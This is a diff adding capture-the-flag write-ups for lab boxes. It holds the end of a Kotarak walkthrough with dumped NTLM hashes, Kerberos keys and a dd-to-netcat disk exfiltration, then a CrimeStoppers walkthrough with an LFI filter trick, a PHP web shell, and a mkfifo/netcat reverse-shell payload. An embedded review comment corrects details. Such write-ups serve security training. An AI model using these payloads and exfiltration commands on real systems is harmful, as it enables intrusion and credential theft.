+ WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
+ atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
+ [*] Kerberos keys from ntds.dit
+ Administrator:aes256-cts-hmac-sha1-96:6c53b16d11a496d0535959885ea7c79c04945889028704e2a4d1ca171e4374e2
+ Administrator:aes128-cts-hmac-sha1-96:e2a25474aa9eb0e1525d0f50233c0274
+ Administrator:des-cbc-md5:75375eda54757c2f
+ WIN-3G2B0H151AC$:aes256-cts-hmac-sha1-96:84e3d886fe1a81ed415d36f438c036715fd8c9e67edbd866519a2358f9897233
+ WIN-3G2B0H151AC$:aes128-cts-hmac-sha1-96:e1a487ca8937b21268e8b3c41c0e4a74
+ WIN-3G2B0H151AC$:des-cbc-md5:b39dc12a920457d5
+ WIN-3G2B0H151AC$:rc4_hmac:668d49ebfdb70aeee8bcaeac9e3e66fd
+ krbtgt:aes256-cts-hmac-sha1-96:14134e1da577c7162acb1e01ea750a9da9b9b717f78d7ca6a5c95febe09b35b8
+ krbtgt:aes128-cts-hmac-sha1-96:8b96c9c8ea354109b951bfa3f3aa4593
+ krbtgt:des-cbc-md5:10ef08047a862046
+ krbtgt:rc4_hmac:ca1ccefcb525db49828fbb9d68298eee
+ WIN2K8$:aes256-cts-hmac-sha1-96:289dd4c7e01818f179a977fd1e35c0d34b22456b1c8f844f34d11b63168637c5
+ WIN2K8$:aes128-cts-hmac-sha1-96:deb0ee067658c075ea7eaef27a605908
+ WIN2K8$:des-cbc-md5:d352a8d3a7a7380b
+ WIN2K8$:rc4_hmac:160f6c1db2ce0994c19c46a349611487
+ WINXP1$:aes256-cts-hmac-sha1-96:347a128a1f9a71de4c52b09d94ad374ac173bd644c20d5e76f31b85e43376d14
+ WINXP1$:aes128-cts-hmac-sha1-96:0e4c937f9f35576756a6001b0af04ded
+ WINXP1$:des-cbc-md5:984a40d5f4a815f2
+ WINXP1$:rc4_hmac:6f5e87fd20d1d8753896f6c9cb316279
+ WIN2K31$:aes256-cts-hmac-sha1-96:f486b86bda928707e327faf7c752cba5bd1fcb42c3483c404be0424f6a5c9f16
+ WIN2K31$:aes128-cts-hmac-sha1-96:1aae3545508cfda2725c8f9832a1a734
+ WIN2K31$:des-cbc-md5:4cbf2ad3c4f75b01
+ WIN2K31$:rc4_hmac:cdd7a7f43d06b3a91705900a592f3772
+ WIN7$:aes256-cts-hmac-sha1-96:b9921a50152944b5849c706b584f108f9b93127f259b179afc207d2b46de6f42
+ WIN7$:aes128-cts-hmac-sha1-96:40207f6ef31d6f50065d2f2ddb61a9e7
+ WIN7$:des-cbc-md5:89a1673723ad9180
+ WIN7$:rc4_hmac:24473180acbcc5f7d2731abe05cfa88c
+ atanas:aes256-cts-hmac-sha1-96:933a05beca1abd1a1a47d70b23122c55de2fedfc855d94d543152239dd840ce2
+ atanas:aes128-cts-hmac-sha1-96:d1db0c62335c9ae2508ee1d23d6efca4
+ atanas:des-cbc-md5:6b80e391f113542a
+ [*] Cleaning up...
+
+
+
+Out of these hashes we want the following:
+
+
+ Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
+ atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
+
+
+
+it's quite odd to have windows stuff on that linux machine, so let's see which machines our reverse shell'd machine can talk to / is currently talking to:
+
+
+ tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$ arp -a
+ ? (10.0.3.133) at 00:16:3e:c9:bd:b1 [ether] on lxcbr0
+ ? (10.10.10.2) at 00:50:56:b9:35:90 [ether] on eth0
+
+ tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$ nc -v 10.0.3.133 22
+ Connection to 10.0.3.133 22 port [tcp/ssh] succeeded!
+ SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
+
+
+
+However it seems like the box kotarak is talking to isn't a windows machine. Therefore we'll need to crack the hashes we got
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
+ → vim hashes
+
+ Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
+ atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
+ → awk -F: '{print $4}' hashes
+ e64fe0f24ba2489c05e64354d74ebd11
+ 2b576acbe6bcfda7294d6bd18041b8fe
+
+
+
+`  
+
+And we have credentials ! we found the Passwords Password123! and f16tomcat! so let's login as atanas via ssh:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
+ → ssh atanas@10.10.10.55
+ atanas@10.10.10.55's password:
+ Permission denied, please try again.
+ atanas@10.10.10.55's password:
+
+
+
+We can't so we're going to go from our previous reverse shell and su there.
+
+
+
+
+ tomcat@kotarak-dmz:/$
+ tomcat@kotarak-dmz:/$ su - atanas
+ Password: f16tomcat!
+
+
+ atanas@kotarak-dmz:~$ ls -l
+ total 4
+ -rw-rw---- 1 atanas atanas 33 Jul 19 2017 user.txt
+ atanas@kotarak-dmz:~$ cat user.txt
+ 93XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag!
+
+## **Part 3 : Getting Root Access**
+
+To get the root flag we need to first check the groups the user is into:
+
+
+ atanas@kotarak-dmz:~$ id
+ uid=1000(atanas) gid=1000(atanas) groups=1000(atanas),4(adm),6(disk),24(cdrom),30(dip),34(backup),46(plugdev),115(lpadmin),116(sambashare)
+
+ atanas@kotarak-dmz:~$ ps -ef | grep lxc
+ root 914 1 0 Dec21 ? 00:00:00 /usr/bin/lxcfs /var/lib/lxcfs/
+ lxc-dns+ 1381 1 0 Dec21 ? 00:00:00 dnsmasq -u lxc-dnsmasq --strict-order --bind-interfaces --pid-file=/run/lxc/dnsmasq.pid --listen-address 10.0.3.1 --dhcp-range 10.0.3.2,10.0.3.254 --dhcp-lease-max=253 --dhcp-no-override --except-interface=lo --interface=lxcbr0 --dhcp-leasefile=/var/lib/misc/dnsmasq.lxcbr0.leases --dhcp-authoritative
+ root 1413 1 0 Dec21 ? 00:00:00 [lxc monitor] /var/lib/lxc kotarak-int
+ atanas 83412 83387 0 10:29 pts/2 00:00:00 grep --color=auto lxc
+
+
+Here we see something odd, the user atanas is in the disk group, which means that he has access to the drives on this machine. Moreover doing ps -ef we see some lxc processes running, therefore it's safe to assume our next step is to look into the LXC container. But first let's poke around the disks since we should have access to them:
+
+
+ atanas@kotarak-dmz:~$ ls -lash /dev/sd*
+ 0 brw-rw---- 1 root disk 8, 0 Dec 21 11:45 /dev/sda
+ 0 brw-rw---- 1 root disk 8, 1 Dec 21 11:45 /dev/sda1
+ 0 brw-rw---- 1 root disk 8, 2 Dec 21 11:45 /dev/sda2
+ 0 brw-rw---- 1 root disk 8, 5 Dec 21 11:45 /dev/sda5
+
+ atanas@kotarak-dmz:~$ mount | grep root
+ /dev/mapper/Kotarak--vg-root on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
+
+
+And here we're hinted at the mounted filesystem Kotarak--vg-root:
+
+
+ atanas@kotarak-dmz:~$ ls -lash /dev/mapper/Kotarak--vg-root
+ 0 lrwxrwxrwx 1 root root 7 Dec 21 11:45 /dev/mapper/Kotarak--vg-root -> ../dm-0
+
+
+
+And here we see that it's a symlink to /dev/dm-0:
+
+
+ atanas@kotarak-dmz:~$ ls -lash /dev/dm-0
+ 0 brw-rw---- 1 root disk 252, 0 Dec 21 11:45 /dev/dm-0
+
+ strings /dev/dm-0
+ ^C
+
+
+running the strings command on dm-0 we see that we can actually read the file, therefore let's send it over to our local machine but first let's check if everything we need is there:
+
+
+ atanas@kotarak-dmz:~$ which dd
+ /bin/dd
+
+ atanas@kotarak-dmz:~$ which nc
+ /bin/nc
+
+ atanas@kotarak-dmz:~$ which gunzip
+ /bin/gunzip
+
+
+
+Looks like it, so we're going to use dd to print out the contents of dm-0 pipe it into gunzip to get rid of the unused 0s and pipe it into netcat to send it back to our machine:
+
+
+ atanas@kotarak-dmz:~$ dd if=/dev/dm-0 | gzip -1 - | nc 10.10.14.6 9095
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Kotarak]
+ → nc -lvnp 9095 > disk.img.gz
+ listening on [any] 9095 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 56702
+
+
+
+using gzip is going to compress the file for us to avoid downloading useless gigabytes filled with 0s
+
+
+
+Wait for it to finish, since the compressed file is 2.2G and then decompress it locally (7.5Gigs)
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ →gunzip disk.img.gz
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → ls -lash disk.img
+ 7.1G -rw-r--r-- 1 nothing nothing 7.0G Dec 22 16:44 disk.img
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → mkdir /mnt/kotarak
+ mkdir: cannot create directory ‘/mnt/kotarak’: Permission denied
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → sudo !!
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → sudo mkdir /mnt/kotarak
+ [sudo] password for nothing:
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → sudo mount disk.img /mnt/kotarak
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → cd /mnt/kotarak
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [/mnt/kotarak]
+ → ls -l
+ total 116
+ drwxr-xr-x 3 root root 4096 Jul 21 2017 backups
+ drwxr-xr-x 2 root root 4096 Jul 10 2017 bin
+ drwxr-xr-x 2 root root 4096 Jul 9 2017 boot
+ drwxr-xr-x 4 root root 4096 Jul 21 2017 dev
+ drwxr-xr-x 105 root root 4096 Jan 18 2018 etc
+ drwxr-xr-x 4 root root 4096 Jul 21 2017 home
+ drwxr-xr-x 24 root root 4096 Jul 21 2017 lib
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 lib32
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 lib64
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 libx32
+ drwx------ 2 root root 16384 Jul 9 2017 lost+found
+ drwxr-xr-x 4 root root 4096 Jul 21 2017 media
+ drwxr-xr-x 2 root root 4096 Jul 19 2016 mnt
+ drwxr-xr-x 4 root root 4096 Jul 21 2017 opt
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 proc
+ drwxrwxrwx 6 root root 4096 Sep 19 2017 root
+ drwxr-xr-x 2 root root 4096 Jul 9 2017 run
+ drwxr-xr-x 2 root root 12288 Jul 21 2017 sbin
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 snap
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 srv
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 sys
+ drwxrwxrwt 10 root root 4096 Dec 22 16:39 tmp
+ drwxr-xr-x 13 root root 4096 Jul 21 2017 usr
+ drwxr-xr-x 15 root root 4096 Jul 21 2017 var
+ lrwxrwxrwx 1 root root 29 Aug 29 2017 vmlinuz -> boot/vmlinuz-4.4.0-87-generic
+ lrwxrwxrwx 1 root root 29 Jul 10 2017 vmlinuz.old -> boot/vmlinuz-4.4.0-83-generic
+
+
+And from here just go to the root directory and print out the root flag:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [/mnt/kotarak]
+ → sudo -i
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~]
+ → cd /mnt/kotarak/var/lib/lxc/kotarak-int/rootfs/root
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [kotarak-int/rootfs/root]
+ → cat root.txt
+ 95XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
+ → sudo umount /mnt/kotarak
+
+
+
+And there you have it!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
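Review bot: the disk-exfiltration step at the end of Part 3 is described as piping dd "into gunzip to get rid of the unused 0s", but the command actually run is `dd if=/dev/dm-0 | gzip -1 - | nc 10.10.14.6 9095`; gunzip would reject raw block-device input ("not in gzip format"), so the prose should say gzip (compression is what squeezes the zero-filled regions, which is why the 7G image travels as 2.2G) and the `which gunzip` check belongs on the receiving side, where `gunzip disk.img.gz` is run. Related points in the same hunk: the first wfuzz listing has a stray shell prompt pasted into the middle of the results (`000000028: 200 2 L 0 W 2 Ch "28"[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~]` followed by `→ msfvenom -l payloads`), which should be cut so the listing reads cleanly; the two nc transfers use placeholder names (`nc 10.10.14.6 9093 < file.bin`, `nc 10.10.14.6 9094 < file.dit`) instead of the real `..._psexec.ntdsgrab._089134.bin` / `..._333512.dit` names, and neither side compares a checksum, unlike the md5sum check done in the CrimeStoppers writeup; the step that turns the two NT hashes into `Password123!` and `f16tomcat!` exists only as an image, so the text should name the tool and command used (the `awk -F: '{print $4}' hashes` line only extracts the hashes); and `sudo mount disk.img /mnt/kotarak` mounts the copied ext4 image read-write, which lets the kernel modify it (journal replay, mount count), so `-o ro,loop` is the safer habit when the image is being treated as evidence. Minor: the text says the decompressed image is 7.5G while `ls -lash` shows 7.0G/7.1G, and the reason ssh as atanas is refused while `su - atanas` succeeds with the same password is never stated.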
diff --git a/Hard/8.md b/Hard/8.md
new file mode 100644
index 0000000..fcbc292
--- /dev/null
+++ b/Hard/8.md
@@ -0,0 +1,611 @@
+# CrimeStoppers Writeup
+
+
+
+## Introduction :
+
+CrimeStoppers is a hard linux box released back in January 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.80 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.80
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
+ → sudo nmap -sCV -p80 10.10.10.80
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-03 10:21 GMT
+ Nmap scan report for 10.10.10.80
+ Host is up (0.033s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.25 ((Ubuntu))
+ |_http-server-header: Apache/2.4.25 (Ubuntu)
+ |_http-title: FBIs Most Wanted: FSociety
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+we navigate to the upload page:
+
+
+
+And here the fun starts. Let's see if this op parameter contains a LFI:
+
+
+
+So it seems the developer tries to protect against LFI attacks, so let's see if we can poke around that some more using well-known php vulnerability with base64 encryption:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
+ → curl http://10.10.10.80/\?op\=php://filter/convert.base64-encode/resource\=view 2>/dev/null | tail -n21 | head -n1
+ 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 <****/footer>
+
+Then simply pipe it through base64 -d and you get the following results:
+
+
+
+Not much in the view php page above, however on the upload php file we see something interesting:
+
+
+
+
+ if(isset($_POST['submit']) && isset($_POST['tip'])) {
+ // CSRF Token to help ensure this user came from our submission form.
+ if 1 == 1 { //(!empty($_POST['token'])) {
+ if (hash_equals($token, $_POST['token'])) {
+ $_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32));
+ // Place tips in the folder of the client IP Address.
+ if (!is_dir('uploads/' . $client_ip)) {
+ mkdir('uploads/' . $client_ip, 0755, false);
+ }
+ $tip = $_POST['tip'];
+ $secretname = genFilename();
+ file_put_contents("uploads/". $client_ip . '/' . $secretname, $tip);
+ header("Location: ?op=view&secretname;=$secretname");
+ } else {
+ print 'Hacker Detected.';
+ print $token;
+ die();
+ }
+ }
+
+
+
+Here we see that the uploaded files are uploaded into **/uploads/ip/** , so we should be able to upload arbitrary data into a file. Moving into the index php page we see something interesting:
+
+
+
+There is a disabled parameter here named 'list' so let's browse to it and see what we get:
+
+
+
+Which reveals us a textfile:
+
+
+
+Which reveals us the parameter "secretname" which most likely designates the filename itself as seen above
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
+ → vim cmd.php
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
+ → cat cmd.php
+ <****?php echo system($_GET['cmd']); ?****>
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
+ → zip shell.zip cmd.php
+ adding: cmd.php (stored 0%)
+
+Now we can use curl to upload to the site. We need the session cookie and the CSRF token, and then we need to follow the redirection (302) location afterward, for debugging purposes we pass it through burpsuite proxy with the **-x 127.0.0.1:8080** as follows:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/HTB/Crimestoppers]
+ → curl -sD - http://10.10.10.80/\?op\=upload -x 127.0.0.1:8080 | grep -e PHPSESSID -e 'name="token"'
+ Set-Cookie: PHPSESSID=kgr3kb7nskn6e2gh6spmtfjfk5; path=/
+ <****input type="text" id="token" name="token" style="display: none" value="16df27a6347c2285cc0dbf5c1525d0f0be26c44cdde404a2fd2c0e90a592ffd6" style="width:355px;" />
+
+Next we use the CSRF token and the session cookie to send the zip file containing our cmd.php payload (btw do it inside bash because there's something zsh doesn't like in it:):
+
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/HTB/Crimestoppers]
+ → bash
+ ┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
+ └─$ curl -X POST -sD - -F "tip=<****shell.zip" -F "name=a" -F "token=16df27a6347c2285cc0dbf5c1525d0f0be26c44cdde404a2fd2c0e90a592ffd6" -F "submit=Send Tip!" -x 127.0.0.1:8080 http://10.10.10.80/\?op\=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=kgr3kb7nskn6e2gh6spmtfjfk5"
+
+` 
+
+We forward the request and we get the location of our file:
+
+
+ ┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
+ └─$ curl -sD - http://10.10.10.80/?op=upload -x 127.0.0.1:8080 | grep -e PHPSESSID -e 'name="token"'
+
+ Set-Cookie: PHPSESSID=cqoq8gg8fqd3cqfl7mflbqfff5; path=/
+ <****input type="text" id="token" name="token" style="display: none" value="74076b162a114837f912f9476baa778842aa1d1385702c88921495bd9d2ccd36" style="width:355px;" />
+
+ ┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
+ └─$ curl -X POST -sD - -F "tip= <****shell.zip" -F "name=a" -F "token=74076b162a114837f912f9476baa778842aa1d1385702c88921495bd9d2ccd36" -F "submit=Send Tip!" -x 127.0.0.1:8080 http://10.10.10.80/\?op\=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=cqoq8gg8fqd3cqfl7mflbqfff5" | grep Location
+
+ Location: ?op=view &secretname;=db0cf33401569e78efe46ec7df40e66a4d1f3252
+
+
+
+now that we have the location **?op=view &secretname;=db0cf33401569e78efe46ec7df40e66a4d1f3252** we can get command execution with the **zip://** filter at **http://10.10.10.80/?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd &cmd;=id**:
+
+
+
+And we have code execution as www-data! Now let's send it over to burpsuite's repeater:
+
+
+
+Now let's see if we can get to the user flag:
+
+ 
+
+And we got the user flag from dom's directory!
+
+## **Part 3 : Getting Root Access**
+
+Before we proceed to privesc let's get a reverse bash shell:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+
+
+
+
+ #RAW PAYLOAD
+ GET /?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd&cmd;=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 9001 >/tmp/f HTTP/1.1
+
+ #URL ENCODED (SELECT AND CTRL+U)
+ http://10.10.10.80/?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd&cmd;=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.11+9001+>/tmp/f
+
+
+
+` 
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.8] from (UNKNOWN) [10.10.10.80] 40832
+ /bin/sh: 0: can't access tty; job control turned off
+ $
+
+
+And we get a reverse shell! Now as usual we spawn a fully interactive TTY:
+
+
+ /bin/sh: 0: can't access tty; job control turned off
+ $ which python python3 wget curl bash sh
+ /usr/bin/python3
+ /usr/bin/wget
+ /bin/bash
+ /bin/sh
+ $ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ www-data@ubuntu:/var/www/html$ ^Z
+ [1] + 429408 suspended nc -lvnp 9001
+
+ [ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
+ → stty raw -echo ; fg
+ [1] + 429408 continued nc -lvnp 9001
+ export TERM=screen-256color
+ www-data@ubuntu:/var/www/html$ export SHELL=bash
+ www-data@ubuntu:/var/www/html$ stty rows 50 columns 200
+ www-data@ubuntu:/var/www/html$ reset
+
+
+
+Now that's done we navigate to dom's home directory to find the .thunderbird hint:
+
+
+ www-data@ubuntu:/var/www/html$ cd /home/dom
+ www-data@ubuntu:/home/dom$ ls -lash
+ total 44K
+ 4.0K drwxr-xr-x 5 dom dom 4.0K Dec 25 2017 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Dec 16 2017 ..
+ 4.0K -rw------- 1 dom dom 52 Dec 16 2017 .Xauthority
+ 4.0K -rw------- 1 dom dom 5 Dec 22 2017 .bash_history
+ 4.0K -rw-r--r-- 1 dom dom 220 Dec 16 2017 .bash_logout
+ 4.0K -rw-r--r-- 1 dom dom 3.7K Dec 16 2017 .bashrc
+ 4.0K drwx------ 2 dom dom 4.0K Dec 16 2017 .cache
+ 4.0K -rw-r--r-- 1 dom dom 675 Dec 16 2017 .profile
+ 4.0K drwx------ 2 dom dom 4.0K Dec 25 2017 .ssh
+ 0 -rw-r--r-- 1 dom dom 0 Dec 16 2017 .sudo_as_admin_successful
+ 4.0K drw-r-xr-x 3 root root 4.0K Dec 16 2017 .thunderbird
+ 4.0K -r--r--r-- 1 root root 33 Jul 9 09:07 user.txt
+
+ www-data@ubuntu:/home/dom$ which nc
+ /bin/nc
+
+
+
+Let's zip it and download it to our box since netcat is already on the box:
+
+
+ [terminal 1]
+ www-data@ubuntu:/home/dom$ zip -r /tmp/thunder.zip .thunderbird/
+
+ www-data@ubuntu:/home/dom$ cd /tmp
+ www-data@ubuntu:/tmp$
+ www-data@ubuntu:/tmp$ ls -l
+ total 408
+ prw-r--r-- 1 www-data www-data 0 Jul 9 10:00 f
+ -rw-r--r-- 1 www-data www-data 414930 Jul 9 09:59 thunder.zip
+ www-data@ubuntu:/tmp$ md5sum thunder.zip
+ 57666b729532e628aac22b2e7d84b21d thunder.zip
+ www-data@ubuntu:/tmp$ cat thunder.zip | nc 10.10.14.8 9999
+
+ [terminal 2]
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → nc -lvnp 9999 > thunder.zip
+ listening on [any] 9999 ...
+ connect to [10.10.14.8] from (UNKNOWN) [10.10.10.80] 49806
+ ^C
+
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → md5sum thunder.zip
+ 57666b729532e628aac22b2e7d84b21d thunder.zip
+
+
+
+Both hashes match, therefore the file transfer was successful.
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → unzip thunder.zip
+ Archive: thunder.zip
+ creating: .thunderbird/
+ creating: .thunderbird/36jinndk.default/
+ inflating: .thunderbird/36jinndk.default/webappsstore.sqlite
+ inflating: .thunderbird/36jinndk.default/extensions.ini
+ extracting: .thunderbird/36jinndk.default/times.json
+ inflating: .thunderbird/36jinndk.default/blist.sqlite
+ extracting: .thunderbird/36jinndk.default/.parentlock
+ inflating: .thunderbird/36jinndk.default/xulstore.json
+ inflating: .thunderbird/36jinndk.default/formhistory.sqlite
+ inflating: .thunderbird/36jinndk.default/**key3.db**
+
+
+
+As we unzip it, we run **mozilla2john** on the **key3.db** file to then crack it using **john** and rockyou.txt:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → sudo /usr/share/john/mozilla2john.py .thunderbird/36jinndk.default/key3.db
+ key3.db:$mozilla$*3*20*1*811d3b70d608a8ad6faee44bf0568bd77ca8b2ca*11*0000000000000000000000*16*1810e3dcb634e700a4d959e35d38f282*20*11a9519177437ef38aa8bf1966d02f0d9f6a8c2f
+
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → sudo /usr/share/john/mozilla2john.py .thunderbird/36jinndk.default/key3.db > key3.db.john
+
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → john -w=/usr/share/wordlists/rockyou.txt key3.db.john --fork=4
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (Mozilla, Mozilla key3.db [SHA1 3DES 32/64])
+ Node numbers 1-4 of 4 (fork)
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ (key3.db)
+ 4 1g 0:00:00:00 DONE (2021-07-09 19:30) 33.33g/s 42666p/s 42666c/s 42666C/s smitty..babygrl
+ 2 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 237479p/s 237479c/s 237479C/s tania.abygurl69
+ 1 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 234069p/s 234069c/s 234069C/s Jakekovac3.ie168
+ Waiting for 3 children to terminate
+ 3 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 230903p/s 230903c/s 230903C/s 0125457423 .a6_123
+ Session completed
+
+
+
+Looks like we have an empty password for our key3.db file so let's install thunderbird to check if this is really an empty password:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/32 ] [~/HTB/Crimestoppers]
+ → sudo apt install thunderbird -y
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~]
+ → cd ~/.thunderbird
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
+ → ls
+ 110d40o6.default 13u77s1u.default-default 'Crash Reports' installs.ini 'Pending Pings' profiles.ini
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
+ → sudo cp -r ~/HTB/Crimestoppers/.thunderbird/36jinndk.default .
+ [sudo] password for nothing:
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
+ → vim profiles.ini
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
+ → cat profiles.ini
+ [Profile1]
+ Name=default
+ IsRelative=1
+ Path=36jinndk.default
+ Default=1
+
+ [InstallFDC34C9F024745EB]
+ Default=13u77s1u.default-default
+ Locked=1
+
+ [Profile0]
+ Name=default-default
+ IsRelative=1
+ Path=13u77s1u.default-default
+
+ [General]
+ StartWithLastProfile=1
+ Version=2
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
+ → thunderbird -ProfileManager
+
+
+
+And after taking a look at dom's emails, we can go into the 'saved passwords' security setting to find her password **Gummer59** so let's get a shell as dom:
+
+
+ www-data@ubuntu:/var/www/html$ su - dom
+ Password: Gummer59
+ dom@ubuntu:~$ id
+ uid=1000(dom) gid=1000(dom) groups=1000(dom),**4(adm)** ,24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
+
+
+
+One interesting thing to note here is that we are part of the **adm** group so we may be able to take a look at the machine's logs. Now that's done let's take a look at her draft emails:
+
+
+ dom@ubuntu:~$ cd .thunderbird/36jinndk.default/ImapMail/crimestoppers.htb/
+ dom@ubuntu:~/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb$ cat Drafts-1
+ From
+ FCC: imap://dom%40crimestoppers.htb@crimestoppers.htb/Sent
+ X-Identity-Key: id1
+ X-Account-Key: account1
+ To: elliot@ecorp.htb
+ From: dom
+ Subject: Potential Rootkit
+ Message-ID: <1f42c857-08fd-1957-8a2d-fa9a4697ffa5@crimestoppers.htb>
+ Date: Sat, 16 Dec 2017 12:53:18 -0800
+ X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; DSN=0; uuencode=0;
+ attachmentreminder=0; deliveryformat=4
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+ Thunderbird/52.5.0
+ MIME-Version: 1.0
+ Content-Type: text/html; charset=utf-8
+ Content-Language: en-US
+ Content-Transfer-Encoding: 8bit
